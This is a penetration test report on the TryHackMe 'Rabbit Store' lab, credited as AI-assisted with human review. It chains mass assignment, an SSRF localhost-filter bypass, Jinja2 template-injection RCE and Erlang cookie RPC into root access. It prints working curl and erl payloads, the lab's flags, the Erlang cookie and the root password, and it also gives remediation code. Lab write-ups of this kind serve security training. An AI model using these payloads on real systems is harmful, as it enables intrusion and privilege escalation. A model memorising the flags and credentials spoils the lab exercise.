Skip to content

RabbitStore_Penetration_Test_Report.md

Latest commit

 

History

History
361 lines (273 loc) · 11.4 KB

RabbitStore_Penetration_Test_Report.md

File metadata and controls

361 lines (273 loc) · 11.4 KB
PeachStudio

Penetration Test Report: Rabbit Store

Target: 10.81.168.19 (TryHackMe - Rabbit Store) Assessment Date: 2026-01-30 Classification: Confidential

Table of Contents

  1. Executive Summary
  2. Scope and Methodology
  3. Attack Chain Overview
  4. Vulnerability Findings
  5. Detailed Exploitation Path
  6. Remediation Recommendations
  7. Appendix: Technical Evidence

Executive Summary

A penetration test was conducted against the Rabbit Store web application. The assessment identified four chained vulnerabilities that allowed complete system compromise:

Severity Count Impact
Critical 2 Remote Code Execution, Privilege Escalation to Root
High 2 Authentication Bypass, Internal Service Access

Key Findings:

  • Mass assignment vulnerability allows subscription bypass
  • SSRF vulnerability exposes internal RabbitMQ management interface
  • Server-Side Template Injection (SSTI) enables remote code execution
  • Erlang cookie exposure combined with weak credential storage allows root access

Final Impact: Full system compromise with root-level access achieved.

Scope and Methodology

Target Systems

Host Services Status
10.81.168.19 SSH (22), HTTP (80), EPMD (4369), RabbitMQ (25672) Compromised

Virtual Hosts Discovered

  • cloudsite.thm - Main marketing site
  • storage.cloudsite.thm - Storage application with authentication

Methodology

  1. Network reconnaissance and service enumeration
  2. Web application analysis and API endpoint discovery
  3. Vulnerability identification and exploitation
  4. Privilege escalation to root
  5. Flag retrieval and documentation

Attack Chain Overview

┌─────────────────────┐
│  1. Mass Assignment │
│  Bypass subscription│
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  2. SSRF Attack     │
│  Access internal    │
│  services           │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  3. SSTI (RCE)      │
│  Shell as azrael    │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  4. Erlang RPC      │
│  Extract RabbitMQ   │
│  credentials        │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  5. Root Access     │
│  su with extracted  │
│  password hash      │
└─────────────────────┘

Vulnerability Findings

Critical Vulnerabilities

VULN-01: Server-Side Template Injection (SSTI)

Severity: Critical (CVSS 9.8) Location: POST /api/fetch_messeges_from_chatbot Affected Component: Flask chatbot service (port 8000)

Description: The chatbot endpoint passes user input directly to Jinja2's render_template_string() without sanitization, enabling arbitrary Python code execution.

Reproduction:

# 1. Obtain valid JWT with active subscription
JWT="<valid_jwt_token>"

# 2. Execute arbitrary commands via SSTI
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"username":"{{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}"}' \
  "http://10.81.168.19/api/fetch_messeges_from_chatbot"

# Response contains: uid=1000(azrael) gid=1000(azrael)

Impact:

  • Remote code execution as user azrael
  • Access to local filesystem and internal network
  • Lateral movement capability

VULN-02: Insecure Credential Storage Leading to Privilege Escalation

Severity: Critical (CVSS 9.1) Location: RabbitMQ internal user database Affected Component: System authentication

Description: The Linux root password is set to the SHA-256 hash extracted from RabbitMQ's user database. Combined with readable Erlang cookies, this allows privilege escalation to root.

Reproduction:

# 1. Copy RabbitMQ's erlang cookie to user's home
echo "1uvTm244k7jSLEga" > /home/azrael/.erlang.cookie
chmod 400 /home/azrael/.erlang.cookie

# 2. Connect to RabbitMQ via Erlang RPC and extract password hash
erl -noinput -sname test -setcookie 1uvTm244k7jSLEga \
  -eval "io:format(\"~p~n\", [rpc:call(rabbit@forge, rabbit_auth_backend_internal, lookup_user, [<<\"root\">>])])" \
  -s init stop

# 3. Extract SHA-256 portion from hash (bytes 5-36)
# Full hash: e3d7ba85295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585
# Password:  295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585

# 4. Switch to root
echo "295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585" | su - root

Impact:

  • Complete system compromise
  • Access to all data and services
  • Ability to establish persistence

High Severity Vulnerabilities

VULN-03: Mass Assignment in User Registration

Severity: High (CVSS 8.1) Location: POST /api/register Affected Component: User registration API

Description: The registration endpoint accepts and processes the subscription field from user input, allowing attackers to self-assign premium subscription status.

Reproduction:

# Register with elevated subscription
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@test.com","password":"Test123!","subscription":"active"}' \
  "http://10.81.168.19/api/register"

# Login to receive JWT with active subscription
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@test.com","password":"Test123!"}' \
  "http://10.81.168.19/api/login" -c -

Impact:

  • Bypass payment/subscription system
  • Access to premium features without authorization
  • Enables exploitation of authenticated endpoints

VULN-04: Server-Side Request Forgery (SSRF)

Severity: High (CVSS 7.5) Location: POST /api/store-url Affected Component: URL fetch functionality

Description: The store-url endpoint fetches arbitrary URLs server-side. While localhost and 127.0.0.1 are blocked, the filter is bypassed using 0.0.0.0 or IPv6 [::1].

Reproduction:

# Access internal RabbitMQ management (port 15672)
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"url":"http://0.0.0.0:15672/"}' \
  "http://10.81.168.19/api/store-url"

# Access internal Flask chatbot (port 8000)
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"url":"http://[::1]:8000/"}' \
  "http://10.81.168.19/api/store-url"

Impact:

  • Access to internal services not exposed externally
  • Port scanning of internal network
  • Potential access to cloud metadata endpoints

Detailed Exploitation Path

Phase 1: Initial Access

Objective: Gain authenticated access to the storage application

  1. Discovered virtual hosts via HTTP redirects
  2. Identified API endpoints through JavaScript analysis
  3. Exploited mass assignment to register with active subscription
  4. Obtained valid JWT for authenticated requests

Phase 2: Internal Reconnaissance via SSRF

Objective: Map internal services

Discovered services:

Port Service Accessible
5672 RabbitMQ AMQP Yes (localhost only)
8000 Flask Chatbot Yes (SSRF target)
15672 RabbitMQ Management Yes (requires auth)

Phase 3: Remote Code Execution

Objective: Obtain shell access

  1. Identified SSTI vulnerability in chatbot endpoint
  2. Confirmed Jinja2 template engine via {{7*7}} returning 49
  3. Achieved RCE using Python os.popen() payload
  4. Retrieved user flag: 98d3a30fa86523c580144d317be0c47e

Phase 4: Privilege Escalation

Objective: Escalate to root

  1. Located Erlang cookie at /var/lib/rabbitmq/.erlang.cookie
  2. Copied cookie to azrael's home directory
  3. Connected to RabbitMQ via Erlang RPC
  4. Extracted root user's password hash from internal database
  5. Identified hint indicating Linux root password equals SHA-256 hash
  6. Used su - root with extracted hash as password
  7. Retrieved root flag: eabf7a0b05d3f2028f3e0465d2fd0852

Remediation Recommendations

Critical Priority

Vulnerability Remediation
SSTI (VULN-01) Never pass user input to render_template_string(). Use parameterized templates with render_template() and escape all dynamic content.
Credential Storage (VULN-02) Use unique, randomly generated passwords for each service. Never derive system passwords from application credentials. Restrict Erlang cookie file permissions to rabbitmq user only.

High Priority

Vulnerability Remediation
Mass Assignment (VULN-03) Implement allowlist validation for registration fields. Only accept email and password; reject or ignore all other fields.
SSRF (VULN-04) Implement comprehensive URL validation including all localhost representations (127.0.0.0/8, 0.0.0.0, ::1, localhost). Use allowlist for permitted external domains.

Code Fixes

SSTI Fix (chatbot.py):

# Before (vulnerable)
template = '...{}'.format(username)
return render_template_string(template)

# After (secure)
return render_template('greeting.html', username=escape(username))

Mass Assignment Fix (registration):

// Before (vulnerable)
const user = await User.create(req.body);

// After (secure)
const { email, password } = req.body;
const user = await User.create({
  email,
  password,
  subscription: 'inactive'  // Always default
});

Appendix: Technical Evidence

Flags Retrieved

Flag Value Location
User 98d3a30fa86523c580144d317be0c47e /home/azrael/user.txt
Root eabf7a0b05d3f2028f3e0465d2fd0852 /root/root.txt

Credentials Discovered

Service Username Credential
Linux root 295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585
RabbitMQ root SHA256 salted hash (see VULN-02)
Erlang - Cookie: 1uvTm244k7jSLEga

Tools Used

  • Nmap - Network scanning
  • curl - HTTP requests
  • Kali Linux MCP - Command execution
  • Python - Hash conversion

Report Information

Prepared By: Claude (AI-Assisted) | Human Review: Vito Rallo | Date: 2026-01-30
Principle: Human in the Loop | Version: 1.0

PEACH STUDIO | Where AI and Cybersecurity Collide | www.peachstudio.be